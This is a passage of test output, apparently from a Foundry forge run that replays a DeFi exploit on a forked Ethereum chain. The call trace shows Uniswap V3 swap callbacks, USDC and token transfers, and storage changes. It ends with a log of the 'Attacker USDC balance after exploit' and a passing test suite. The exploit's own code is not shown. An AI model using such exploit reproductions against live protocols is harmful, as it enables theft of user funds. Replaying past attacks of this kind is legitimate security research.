    │   ├─ [42344] 0xE558f01FCb39B11B2000D11e9a18DcF105f78964::swap(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], false, 1145923460994446 [1.145e15], 1461446703485210103287273052203988822378723970341 [1.461e48], 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000400000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000000000000000000000002bebf2096e01455108badcbaf86ce30b6e5a72aa520001f4a0b86991c6218b36c1d19d4a2e9eb0ce3606eb48000000000000000000000000000000000000000000)
    │   │   ├─ [4817] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 72556118375 [7.255e10])
    │   │   │   ├─ [4028] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 72556118375 [7.255e10]) [delegatecall]
    │   │   │   │   ├─ emit Transfer(from: 0xE558f01FCb39B11B2000D11e9a18DcF105f78964, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 72556118375 [7.255e10])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x6880afd761842d3cdeedc0b7f76510afeab822c4b73a4bf299e44894163ee697: 0x000000000000000000000000000000000000000000000000000000338cb0d32b → 0x00000000000000000000000000000000000000000000000000000022a80251c4
    │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0x0000000000000000000000000000000000000000000000000000001770039524 → 0x0000000000000000000000000000000000000000000000000000002854b2168b
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   ├─ [1615] 0xebF2096E01455108bAdCbAF86cE30b6e5A72aa52::balanceOf(0xE558f01FCb39B11B2000D11e9a18DcF105f78964) [staticcall]
    │   │   │   ├─ [836] 0x78fe13802Ba4E487F69c87850eA557CfC292b472::balanceOf(0xE558f01FCb39B11B2000D11e9a18DcF105f78964) [delegatecall]
    │   │   │   │   └─ ← [Return] 8914429753782298 [8.914e15]
    │   │   │   └─ ← [Return] 8914429753782298 [8.914e15]
    │   │   ├─ [10565] 0xE592427A0AEce92De3Edee1F18E0157C05861564::uniswapV3SwapCallback(-72556118375 [-7.255e10], 1145923460994446 [1.145e15], 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000400000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000000000000000000000002bebf2096e01455108badcbaf86ce30b6e5a72aa520001f4a0b86991c6218b36c1d19d4a2e9eb0ce3606eb48000000000000000000000000000000000000000000)
    │   │   │   ├─ [6479] 0xebF2096E01455108bAdCbAF86cE30b6e5A72aa52::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xE558f01FCb39B11B2000D11e9a18DcF105f78964, 1145923460994446 [1.145e15])
    │   │   │   │   ├─ [5691] 0x78fe13802Ba4E487F69c87850eA557CfC292b472::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xE558f01FCb39B11B2000D11e9a18DcF105f78964, 1145923460994446 [1.145e15]) [delegatecall]
    │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xE558f01FCb39B11B2000D11e9a18DcF105f78964, value: 1145923460994446 [1.145e15])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x5223e63f0507f82c7e25e324cdfe3030bae704b36135ec7694b55330a3b5b731: 0x0000000000000000000000000000000000000000000000000008246c31aa2b1c → 0x0000000000000000000000000000000000000000000000000004123618d5158e
    │   │   │   │   │   │   @ 0xb496c955f42445db28fa18b947aeed77cf415101c881261bd65945ecae63ac22: 0x000000000000000000000000000000000000000000000000001faba06ad9701a → 0x0000000000000000000000000000000000000000000000000023bdd683ae85a8
    │   │   │   │   │   │   @ 0x79d9846fbf5ba218e1675f258b761876af9d0333b76e2773cfc8b3432ed7262b: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffffffffffbedc9e72aea71
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Stop]
    │   │   ├─ [1615] 0xebF2096E01455108bAdCbAF86cE30b6e5A72aa52::balanceOf(0xE558f01FCb39B11B2000D11e9a18DcF105f78964) [staticcall]
    │   │   │   ├─ [836] 0x78fe13802Ba4E487F69c87850eA557CfC292b472::balanceOf(0xE558f01FCb39B11B2000D11e9a18DcF105f78964) [delegatecall]
    │   │   │   │   └─ ← [Return] 10060353214776744 [1.006e16]
    │   │   │   └─ ← [Return] 10060353214776744 [1.006e16]
    │   │   ├─ emit Swap(param0: 0xE592427A0AEce92De3Edee1F18E0157C05861564, param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: -72556118375 [-7.255e10], param3: 1145923460994446 [1.145e15], param4: 10016166606243848387786391344626 [1.001e31], param5: 735939883996233 [7.359e14], param6: 96797 [9.679e4])
    │   │   ├─  storage changes:
    │   │   │   @ 0: 0x000100004a004a0000017925000000000000007cdd908173cf479a2d2341ddd5 → 0x000100004a004a0000017a1d000000000000007e6bfad42b512f0c2aa84ed5f2
    │   │   │   @ 2: 0x0000000000000000000000000000000011450e2b969cc740fcf3e72e268a0e4e → 0x00000000000000000000000000000000117813f97aa1ee0839abfe728f5d949b
    │   │   └─ ← [Return] -72556118375 [-7.255e10], 1145923460994446 [1.145e15]
    │   └─ ← [Return] 72556118375 [7.255e10]
    ├─ [1315] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 173219649163 [1.732e11]
    │   └─ ← [Return] 173219649163 [1.732e11]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker USDC balance after exploit", val: 173219649163 [1.732e11], decimals: 6)
    ├─  storage changes:
    │   @ 0x79d9846fbf5ba218e1675f258b761876af9d0333b76e2773cfc8b3432ed7262b: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   @ 0xc81d9832a58ca5596ef91aeee7b9876071d1b466739bb153bc12d9794dc6ec7e: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   @ 0x6200be9415d665c0b9d12b8ae15eba82ec01318cb52c0c916659aca2d93e6373: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   @ 0: 0x00000002d002d001200320080000000000006d5ea41668fac7aaa45d0a67bd70 → 0x000100004a004a0000017a1d000000000000007e6bfad42b512f0c2aa84ed5f2
    │   @ 16: 0 → 0x0000000000000000000000000000000000000000000000000000000001000000
    │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000000001bc16d674ec80000
    │   @ 0x786b0e645aa5b3c5ca100bdff438c81600323479b05fbfe52393cd4c6bbecc86: 0x0000000000000000000000000000000000000000000000000000000abc699d92 → 0x0000000000000000000000000000000000000000000000000000000ada370292
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 36.21s (34.29s CPU time)

Ran 2 test suites in 37.10s (37.16s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
